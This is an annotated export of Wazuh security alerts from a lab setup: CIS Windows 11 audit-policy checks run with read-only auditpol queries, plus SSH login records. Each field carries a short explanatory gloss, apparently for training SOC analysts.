data.sca.check.title: Ensure 'Audit Detailed File Share' is set to include 'Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory allows you to audit attempts to access files and folders on a shared folder. Events for this subcategory include: - 5145: network share object was checked to see whether client can be granted desired access. The recommended state for this setting is to include: Failure. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing the Failures will log which unauthorized users attempted (and failed) to get access to a file or folder on a network share on this computer, which could possibly be an indication of malicious intent. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Detailed File Share Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 3.3,8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Detailed File Share"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['3.3', '8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534653.2351868 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26158 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit File Share' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit attempts to access a shared folder. The recommended state for this setting is: Success and Failure. Note: There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all shared folders on the system is audited. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: In an enterprise managed environment, workstations should have limited file sharing activity, as file servers would normally handle the overall burden of file sharing activities. Any unusual file sharing activity on workstations may therefore be useful in an investigation of potentially malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit File Share Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 3.3,8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"File Share"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534654.2354908 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:13.230035+00:00 server1 sshd[3349]: pam_unix(sshd:session): session closed for user simba The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:13.230035+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534659.2355301 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26159 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Other Object Access Events' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit events generated by the management of task scheduler jobs or COM+ objects. For scheduler jobs, the following are audited: - Job created. - Job deleted. - Job enabled. - Job disabled. - Job updated. For COM+ objects, the following are audited: - Catalog object added. - Catalog object updated. - Catalog object deleted. The recommended state for this setting is: Success and Failure. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The unexpected creation of scheduled tasks and COM+ objects could potentially be an indication of malicious activity. Since these types of actions are generally low volume, it may be useful to capture them in the audit logs for use during an investigation. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Other Object Access Events Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Other Object Access Events"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534662.2358595 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:43:17.4781170Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2419 Incremental log record number – handy for timeline order.
data.win.system.processID: 16152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:17Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:17Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534664.2360177 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:23.581338+00:00 server1 sshd[3411]: Accepted password for simba from 192.168.6.135 port 42842 ssh2 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:23.581338+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: sshd Parent decoder used – for nested parsing.
decoder.name: sshd Name of the Wazuh decoder that parsed this raw log.
data.srcip: 192.168.6.135 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.srcport: 42842 Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534664.2360644 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:23.585709+00:00 server1 sshd[3411]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:23.585709+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534665.2361103 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26160 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Removable Storage' is set to 'Success and Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated only for all objects for all types of access requested. If you configure this policy setting, an audit event is generated each time an account accesses a file system object on a removable storage. Success audits record successful attempts and Failure audits record unsuccessful attempts. If you do not configure this policy setting, no audit event is generated when an account accesses a file system object on a removable storage. The recommended state for this setting is: Success and Failure. Note: A Windows 8.0, Server 2012 (non-R2) or newer OS is required to access and set this value in Group Policy. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing removable storage may be useful when investigating an incident. For example, if an individual is suspected of copying sensitive information onto a USB drive. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Removable Storage Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Removable Storage"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534672.2364815 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26161 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Audit Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in audit policy including SACL changes. Events for this subcategory include: - 4715: The audit policy (SACL) on an object was changed. - 4719: System audit policy was changed. - 4902: The Per-user audit policy table was created. - 4904: An attempt was made to register a security event source. - 4905: An attempt was made to unregister a security event source. - 4906: The CrashOnAuditFail value has changed. - 4907: Auditing settings on object were changed. - 4908: Special Groups Logon table modified. - 4912: Per User Audit Policy was changed. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Audit Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Audit Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534672.2368099 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26162 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Authentication Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in authentication policy. Events for this subcategory include: - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4713: Kerberos policy was changed. - 4716: Trusted domain information was modified. - 4717: System security access was granted to an account. - 4718: System security access was removed from an account. - 4739: Domain Policy was changed. - 4864: A namespace collision was detected. - 4865: A trusted forest information entry was added. - 4866: A trusted forest information entry was removed. - 4867: A trusted forest information entry was modified. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authentication Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Authentication Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534682.2371559 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26163 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Authorization Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in authorization policy. Events for this subcategory include: - 4704: A user right was assigned. - 4705: A user right was removed. - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4714: Encrypted data recovery policy was changed. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Authorization Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534684.2374351 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:44:44.558262+00:00 server1 sshd[3469]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:44:44.558262+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
